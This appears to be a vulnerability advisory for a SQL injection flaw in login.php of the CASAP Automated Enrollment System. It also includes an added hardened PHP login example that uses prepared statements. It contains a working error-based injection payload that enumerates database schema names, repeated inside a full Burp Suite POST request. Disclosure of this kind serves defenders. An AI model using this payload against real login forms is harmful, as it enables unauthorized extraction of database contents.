The PHP code on the fourth line of the \Final\login.php file reads user input from a POST parameter. That value is then passed on without proper sanitization or validation and is ultimately used in a database query on line 21 of the \Final\login.php file. This may lead to SQL injection attacks.
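A hardened login lookup for the pattern described above, as an added example that is not the project's own login.php. The report does not show the source, so the table and column names (`users`, `id`, `username`, `password_hash`), the use of `password_hash()` for stored passwords, and the connection values are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not the project's login.php. Assumed: table `users` with
// columns id, username, password_hash; connection values are placeholders.
// Illustrative vulnerable shape (POST value concatenated into the SQL text):
//   "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'"

// Make mysqli throw exceptions so query failures are never silently ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function find_user(mysqli $db, string $username): ?array
{
    // The ? placeholder is bound as data, so quotes in it cannot alter the query.
    $stmt = $db->prepare(
        'SELECT id, username, password_hash FROM users WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

function login(mysqli $db, array $post): bool
{
    $username = $post['username'] ?? '';
    $password = $post['password'] ?? '';
    // Reject arrays (username[]=x), empty values and oversized input up front.
    if (!is_string($username) || !is_string($password)
        || $username === '' || strlen($username) > 64) {
        return false;
    }
    $user = find_user($db, $username);
    if ($user === null || !password_verify($password, $user['password_hash'])) {
        return false;
    }
    session_regenerate_id(true); // new session id after authentication
    $_SESSION['user_id'] = (int) $user['id'];
    return true;
}

session_start();
$db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'app_db'); // placeholders
$db->set_charset('utf8mb4');
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    http_response_code(login($db, $_POST) ? 200 : 401);
}
```

With the bound parameter, a value such as the payload in this report is only compared as a literal username and never parsed as SQL. Keep `display_errors` off in production and connect with a database account that has no DBA privileges, so a database error or a missed query elsewhere exposes as little as possible.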
Impact
Attackers can exploit this vulnerability to gain database privileges, which can result in the disclosure of a large amount of data in the database. If the target's database is running with DBA privileges, the attacker may also be able to obtain privileges on the server host.
DESCRIPTION
Deng Shengke has discovered a serious issue in "CASAP Automated Enrollment System using PHP/MySQLi with Source Code" that can allow attackers to obtain large amounts of database content through SQL injection attacks.
Vulnerability details and POC
Payload
username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
Burp Suite (POC)
POST /login.php HTTP/1.1
Host: www.final.com:10001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://www.final.com:10001
Connection: close
Referer: http://www.final.com:10001/index.php
username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
Here is the MySQL database name obtained from the sqlmap attack
SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection